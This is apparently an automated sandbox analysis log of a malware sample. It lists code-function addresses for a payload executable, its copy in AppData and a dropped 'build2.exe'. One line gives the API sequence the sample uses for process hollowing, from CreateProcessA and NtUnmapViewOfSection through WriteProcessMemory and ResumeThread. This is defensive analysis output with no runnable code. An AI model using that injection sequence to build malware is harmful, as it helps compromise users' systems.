                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_005B0110
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401350 GetCurrentProcess,NtQueryInformationProcess,5_2_00401350
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9D2400_2_00B9D240
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA9F900_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B970E00_2_00B970E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B980300_2_00B98030
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBF0100_2_00BBF010
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBE0030_2_00BBE003
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9C0700_2_00B9C070
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B950570_2_00B95057
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B921C00_2_00B921C0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C581130_2_00C58113
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA01600_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C593430_2_00C59343
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BD237E0_2_00BD237E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC44FF0_2_00BC44FF
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B984C00_2_00B984C0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B954570_2_00B95457
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B954470_2_00B95447
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BDB5B10_2_00BDB5B1
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BD95060_2_00BD9506
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BAE6900_2_00BAE690
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B996860_2_00B99686
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9A6600_2_00B9A660
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BDD7A10_2_00BDD7A1
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B987800_2_00B98780
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9F7300_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9A7100_2_00B9A710
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B927500_2_00B92750
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B967400_2_00B96740
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B968800_2_00B96880
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBC8040_2_00BBC804
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B969F30_2_00B969F3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BDD9DC0_2_00BDD9DC
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C119200_2_00C11920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BD9A710_2_00BD9A71
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B92B800_2_00B92B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B96B800_2_00B96B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BD3B400_2_00BD3B40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B99CF90_2_00B99CF9
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BDACFF0_2_00BDACFF
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B99DFA0_2_00B99DFA
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9BDC00_2_00B9BDC0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB7D6C0_2_00BB7D6C
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9DD400_2_00B9DD40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B96EE00_2_00B96EE0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBCE510_2_00BBCE51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BD9FE30_2_00BD9FE3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB0F300_2_00BB0F30
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B99F760_2_00B99F76
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0030E0032_2_0030E003
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002FE6902_2_002FE690
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EF7302_2_002EF730
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003619202_2_00361920
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F9F902_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E80302_2_002E8030
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0030F0102_2_0030F010
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EC0702_2_002EC070
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E50572_2_002E5057
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E70E02_2_002E70E0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003A81132_2_003A8113
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F01602_2_002F0160
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E21C02_2_002E21C0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002ED2402_2_002ED240
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003152402_2_00315240
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0032237E2_2_0032237E
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003A93432_2_003A9343
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E54472_2_002E5447
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E54572_2_002E5457
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003144FF2_2_003144FF
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E84C02_2_002E84C0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003295062_2_00329506
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0032B5B12_2_0032B5B1
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003156752_2_00315675
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EA6602_2_002EA660
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E96862_2_002E9686
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EA7102_2_002EA710
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E67402_2_002E6740
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E27502_2_002E2750
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0032D7A12_2_0032D7A1
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E87802_2_002E8780
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0030C8042_2_0030C804
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E68802_2_002E6880
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003149F32_2_003149F3
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E69F32_2_002E69F3
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0032D9DC2_2_0032D9DC
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00329A712_2_00329A71
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00323B402_2_00323B40
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E2B802_2_002E2B80
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E6B802_2_002E6B80
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0032ACFF2_2_0032ACFF
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E9CF92_2_002E9CF9
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00307D6C2_2_00307D6C
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EDD402_2_002EDD40
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E9DFA2_2_002E9DFA
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EBDC02_2_002EBDC0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00314E0B2_2_00314E0B
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0030CE512_2_0030CE51
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E6EE02_2_002E6EE0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00300F302_2_00300F30
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002E9F762_2_002E9F76
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00329FE32_2_00329FE3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBE0033_2_00BBE003
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9D2403_2_00B9D240
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BAE6903_2_00BAE690
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9F7303_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00C119203_2_00C11920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA9F903_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B970E03_2_00B970E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B980303_2_00B98030
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBF0103_2_00BBF010
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9C0703_2_00B9C070
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B950573_2_00B95057
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B921C03_2_00B921C0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00C581133_2_00C58113
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA01603_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00C593433_2_00C59343
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD237E3_2_00BD237E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BC44FF3_2_00BC44FF
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B984C03_2_00B984C0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B954573_2_00B95457
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B954473_2_00B95447
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDB5B13_2_00BDB5B1
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD95063_2_00BD9506
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B996863_2_00B99686
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9A6603_2_00B9A660
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDD7A13_2_00BDD7A1
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B987803_2_00B98780
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9A7103_2_00B9A710
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B927503_2_00B92750
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B967403_2_00B96740
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B968803_2_00B96880
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBC8043_2_00BBC804
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B969F33_2_00B969F3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDD9DC3_2_00BDD9DC
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD9A713_2_00BD9A71
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B92B803_2_00B92B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B96B803_2_00B96B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD3B403_2_00BD3B40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99CF93_2_00B99CF9
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDACFF3_2_00BDACFF
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99DFA3_2_00B99DFA
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9BDC03_2_00B9BDC0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB7D6C3_2_00BB7D6C
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9DD403_2_00B9DD40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B96EE03_2_00B96EE0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBCE513_2_00BBCE51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD9FE33_2_00BD9FE3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB0F303_2_00BB0F30
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99F763_2_00B99F76
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004149FD4_2_004149FD
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040727D4_2_0040727D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0041421D4_2_0041421D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00413D484_2_00413D48
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0041152A4_2_0041152A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004145F14_2_004145F1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040D6584_2_0040D658
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00414E1D4_2_00414E1D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E08334_2_005E0833
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E00C34_2_005E00C3
